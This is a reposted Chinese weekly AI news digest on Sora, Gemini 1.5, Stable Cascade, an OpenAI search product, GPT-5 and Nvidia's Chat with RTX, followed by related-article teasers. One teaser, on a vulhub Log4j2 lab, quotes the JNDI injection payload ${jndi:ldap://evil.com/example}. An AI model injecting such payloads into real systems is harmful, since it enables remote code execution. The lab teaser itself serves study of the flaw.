【每周AI简讯】OpenAI推出王炸文生视频模型Sora

news2024/10/4 14:56:32

ChatGPT中文版icon-default.png?t=N7T8https://ai7.pro

OpenAI推出王炸文生视频模型Sora

OpenAI 宣布推出名为 Sora 的新型文本到视频模型。Sora 能根据用户的文本提示,生成长达一分钟的逼真视频。它可以创造出细节丰富的场景、复杂的摄影机运动以及表情丰富的多个角色。Sora 是一种扩散模型,能从类似静态噪声的序列开始,通过多次迭代去除噪声,制作完整视频。Sora目前小范围开放给AI专家,以测试其安全性,未对公众开放。

tokyo-walk

Google推出Gemini 1.5 模型

Google 推出新的 Gemini 1.5 模型,以对抗 OpenAI 的 GPT 4 Turbo。这款模型采用新的专家混合(MoE)架构,提升了计算效率,能以较低的计算功率运行。Gemini 1.5 Pro 拥有 128,000 个令牌的标准上下文窗口,并为部分用户和企业客户提供高达 100 万令牌的上下文窗口。此外,该模型在处理大型数据集方面表现出色,如一小时视频、11小时音频、超过 30,000 行代码的代码库或超过 700,000 字的文档。Gemini 1.5 Pro 还通过了“海底捞针”测试,显示出在大型数据集中准确检索文本的能力。

图片

Stability AI 发布图像生成模型 Stable Cascade

Stability AI 推出了新型图像生成模型 Stable Cascade,这是开源模型 Stable Diffusion 的继任者。Stable Cascade 拥有多种新特性,如改变已创建图像、提高现有图像分辨率、内部填充和外部延伸。它使用三种基于 Würstchen 架构的大型语言模型,分阶段处理文本提示,并将其转换为紧凑的代码片段,进而生成图像。与 Stable Diffusion 相比,它能在更短的时间内(仅需10秒)生成图像,而且更准确、更吸引人。

图片

OpenAI 推出新型网络搜索产品,挑战 Google

OpenAI 正在开发一款新型网络搜索引擎产品,旨在挑战 Google 在搜索引擎市场的地位。这款产品可能部分依赖于 Microsoft 的 Bing 搜索引擎,考虑到 Microsoft 是 OpenAI 的最大投资者。目前,OpenAI 的 ChatGPT 通过提炼网页内容为约 100 字的摘要来进行网络搜索,但这种方式在捕捉页面完整信息方面存在性能慢和不可靠的问题。OpenAI 正考虑推出专门的搜索服务,以实现更快速、更准确的搜索能力,可能成为 Google 先进的生成型 AI 搜索工具的竞争对手。此外,OpenAI 正在探索将其网络搜索技术与其他创新项目整合的可能性。

图片

GPT-5 将更快更智能,具备多模态功能

OpenAI 的 CEO Sam Altman 在世界政府峰会上透露,即将推出的 GPT-5 模型将比 GPT-4 在所有方面都表现更好。GPT-5 将更智能、更快速,并且可能具备多模态功能。这意味着 AI 将来可以接收更多类型的输入。Altman 强调了这款模型广泛应用性是其最迷人的特点,它在众多任务中都有细微的改进,而非仅在某单一领域突出。尽管 Altman 没有具体说明发布时间表,但他之前已经指出预测 GPT-5 将带来的进步存在挑战。此外,有传言称 GPT-5 可能被命名为 "Gobi",它是一款正在开发中的多模态 AI 模型,预计将于 2024 年春季亮相。

图片

Nvidia 推出可本地运行的 AI 聊天机器人 Chat with RTX

Nvidia 推出了一款名为 Chat with RTX 的新 AI 聊天机器人,可以在设备上本地运行,无需互联网连接。这款产品面向拥有 GeForce RTX 30 系列和 40 系列显卡的用户。Chat with RTX 允许用户定制生成 AI 模型,类似于 OpenAI 的 ChatGPT,可以与用户的文档、文件和笔记集成以检索信息。此外,它支持 Mistral 的开源 AI 模型和 Meta 的大型语言模型 Llama 2。Chat with RTX 能处理多种文件格式,包括文本、PDF、.doc、.docx 和 .xml,甚至可以导入 YouTube 播放列表的视频转录。但是,它无法像 ChatGPT 那样保留上下文信息,这可能限制了其某些用途的有效性。

图片

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1456936.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

PyCharm 主题和字体 (Scheme Editor Font)

PyCharm 主题和字体 [Scheme & Editor Font] References Scheme & Editor Font File -> Settings -> Editor -> Colors & Fonts -> Font Show only monospaced fonts: 只显示等宽字体。编程时使用等宽字体效果较好。 References [1] Yon…

前端win10如何设置固定ip(简单明了)

1、右击这个 2、点击属性 3、双击协议版本4设置成以下就ok

基于Springboot+Vue的超市管理系统源码

✌全网粉丝20W,csdn特邀作者、博客专家、CSDN新星计划导师、java领域优质创作者,博客之星、掘金/华为云/阿里云/InfoQ等平台优质作者、专注于Java技术领域和毕业项目实战✌ 🍅文末获取项目下载方式🍅 一、项目背景介绍: 随着社会经济的发展和…

第三百五十五回

文章目录 1. 概念介绍2. 获取方法3. 示例代码4. 对比与总结4.1 横向对比4.2 内容总结 我们在上一章回中介绍了"如何获取当前系统语言"相关的内容,本章回中将介绍如何获取当前时区.闲话休提,让我们一起Talk Flutter吧。 1. 概念介绍 我们使用的…

探索与实践:深度解读禅道项目管理工具的高效运用

【引言】 在日益复杂的现代项目管理领域中,一款优秀的项目管理工具能够极大地提升团队协作效率,降低项目风险,而禅道正是这样一款深受开发者和项目经理喜爱的产品。它是一款基于敏捷开发理念设计的开源项目管理软件,涵盖了产品管…

One API初体验

前言 忘了在微信公众号是先看到了FastGPT还是One API了,反正对于自己来说知识库或One API都是个新东西,都有很强大的活力。One API在我看来,可能更基础、部署更简单一些,于是打算先搞个One API部署来看看。 One API是开源的&…

使用openai-whisper实现语音转文字

使用openai-whisper实现语音转文字 1 安装依赖 1.1 Windows下安装ffmpeg FFmpeg是一套可以用来记录、转换数字音频、视频,并能将其转化为流的开源计算机程序。采用LGPL或GPL许可证。它提供了录制、转换以及流化音视频的完整解决方案。 # ffmpeg官网 https://ffm…

业务型 长时间组件封装(复制即可使用)

{/*disabledAfter 日期限制 例如传入5 则只能选择今天日期5天内的时间 */} import React from react; import { DatePicker } from antd; import moment from moment;const { RangePicker } DatePicker;const CustomRangePicker ({ value, onChange, disabledAfter, ...restP…

小迪安全2023最新版笔记集合--续更

小迪安全2023最新版笔记集合–续更 小迪安全2023最新笔记集合 章节一 ---- 基础入门: 知识点集合: 应用架构:Web/APP/云应用/三方服务/负载均衡等 安全产品:CDN/WAF/IDS/IPS/蜜罐/防火墙/杀毒等 渗透命令:文件上传下…

Linux——开发工具的使用

目录 Linux软件包管理器 yum rzsz Linux编辑器——vim vim的使用 vim的基本操作 命令模式的常见命令 底行模式的常见命令 vim是需要配置的 Linux编译器——gcc/g 预处理 编译 汇编 链接 函数库 Linux项目自动化构建工具 make/makefile make原理 项目清理 Linux调试器g…

【JPCS出版|EI稳定检索】2024年第四届人工智能与工业技术应用国际学术会议(AIITA 2024)

2024年第四届人工智能与工业技术应用国际学术会议(AIITA 2024) 2024 4th International Conference on Artificial Intelligence and Industrial Technology Applications 2024年4月12日-14日 | 中国广州 大会官网:www.aiita.net 二轮截稿…

基于Springboot的校园求职招聘系统(有报告)。Javaee项目,springboot项目。

演示视频: 基于Springboot的校园求职招聘系统(有报告)。Javaee项目,springboot项目。 项目介绍: 采用M(model)V(view)C(controller)三层体系结构…

学习Android的第十六天

目录 Android 自定义 Adapter Adapter 接口 SpinnerAdapter ListAdapter BaseAdapter 自定义 BaseAdapter 参考文档 Android ListView 列表控件 ListView 的属性和方法 表头表尾分割线的设置 列表从底部开始显示 android:stackFromBottom 设置点击颜色 cacheColorH…

数据安全治理【概述】

数据安全治理,顾名思义,可拆分为“数据安全”与“治理”数据安全可理解为目标,治理可理解为手段。具体定义:数据安全治理是指在组织数据安全战略的指导下,为确保组织数据处于有效保护和合法利用的状态,以及…

vulhub中Apache Log4j2 lookup JNDI 注入漏洞(CVE-2021-44228)

Apache Log4j 2 是Java语言的日志处理套件,使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似于${jndi:ldap://evil.com/example}的lookup用于进行JNDI注入,执行任意代码。…

Java学习小记——多线程Socket编程

目录 线程池线程池介绍线程池的参数 Java线程池ExecutorTester服务器socket编程普通socket编程线程池并行处理客户请求Java NIO异步处理客户请求 线程池 线程池介绍 在创建一个线程时存在一定的开销,创建线程的开销相比于一般的算法来说较大。首先需要建立一个调用…

如何在Windows 10中启用或关闭Windows功能?这里有详细步骤

Windows 10是一个拥有数百种功能的大型操作系统。与任何其他操作系统或软件一样,大多数PC用户从未使用Windows 10中提供的所有功能。例如,内置的XPS Viewer对大多数PC用户来说都是陌生的,尽管它自Windows7推出以来就一直存在。 高级PC用户通…

mybatis 基础入门使用

1、mybatis 简介 1.1、mybatis 特性 MyBatis 是支持定制化 SQL、存储过程以及高级映射的优秀的持久层框架; MyBatis 避免了几乎所有的 JDBC 代码和手动设置参数以及获取结果集; MyBatis可以使用简单的XML或注解用于配置和原始映射,将接口和…

百度云AI

百度云AI概述 Face腾讯优图科大讯飞 百度人脸识别基于深度学习的人脸识别方案,准确识别图片中的人脸信息,提供如下功能: 人脸检测:精准定位图中人脸,获得眼、口、鼻等72个关键点位置,分析性别、年龄、表…

CI/CD部署

什么是CI,什么是CD CI和CD是软件开发中持续集成和持续交付的缩写。 CI代表持续集成(Continuous Integration),是一种实践,旨在通过自动化构建、测试和代码静态分析等过程,频繁地将代码变更合并到共享存储…